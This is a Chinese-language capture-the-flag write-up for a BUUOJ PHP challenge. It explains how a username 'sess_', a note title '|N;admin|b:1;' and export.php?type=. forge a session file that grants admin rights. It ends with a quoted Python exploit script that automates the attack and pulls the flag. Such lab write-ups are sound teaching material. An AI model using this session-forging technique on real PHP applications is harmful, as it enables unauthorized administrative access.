这道题的考点是SESSION反序列化,因为之前没有做过,所以这里参考大佬的wp勉勉强强
做下来了.
这里给出了源码,我们直接看代码.
<section>
<h2>Get flag</h2>
<p>
<?php
if (is_admin()) {
echo "Congratulations! The flag is: <code>" . getenv('FLAG') . "</code>";
} else {
echo "You are not an admin :(";
}
?>
</p>
</section>
如果我们想要获得flag就必须满足is_admin(),
function is_admin() {
if (!isset($_SESSION['admin'])) {
return false;
}
return $_SESSION['admin'] === true;
}
需要获得admin的session
上网查阅session 的原理了解到session默认是存储在文件中的命名为’sess_’+ PHPSESSID 的文件,内容为session的序列化字符串。形如:参数名|类型:长度:值
例如:$_SESSION['key']='value';在文件中表示为key|s:5:"value";
在init.php和export.php中我们可以看到session和Add note
写入的文件保存在同一目录
#init.php
<?php
error_reporting(0);
require_once('config.php');
require_once('lib.php');
session_save_path(TEMP_DIR);
session_start();
#export.php
$filename = get_user() . '-' . bin2hex(random_bytes(8)) . '.' . $type;
$filename = str_replace('..', '', $filename); // avoid path traversal
$path = TEMP_DIR . '/' . $filename;
那么只需要创建一个用户名为: sess_
Ubuntu默认安装的PHP中session.serialize_handler默认设置为php,而这种引擎特点是即可使用|作为键值隔离符。利用|即可将序列化字符串拼接
然后Add note提交title为:|N;admin|b:1;,这样反序列化结果即可为:admin==bool(true)
最后export.php?type=.即可使得这个.与前面的.拼接成..被替换为空,$filename也就成为了session文件名了
下载文件,将sess_后的-795b103492a38d34的写入到PHPSESSID中即可完成反序列化
这里大佬直接用脚本做,贴一下
import re
import requests
URL = 'http://a57fc9a9-2abd-4fcd-b11b-246e3e346706.node3.buuoj.cn/'
while True:
# login as sess_
sess = requests.Session()
sess.post(URL + 'login.php', data={
'user': 'sess_'
})
# make a crafted note
sess.post(URL + 'add.php', data={
'title': '|N;admin|b:1;',
'body': 'hello'
})
# make a fake session
r = sess.get(URL + 'export.php?type=.').headers['Content-Disposition']
print(r)
sessid = re.findall(r'sess_([0-9a-z-]+)', r)[0]
print(sessid)
# get the flag
r = requests.get(URL + '?page=flag', cookies={
'PHPSESSID': sessid
}).content.decode('utf-8')
flag = re.findall(r'flag\{.+\}', r)
if len(flag) > 0:
print(flag[0])
break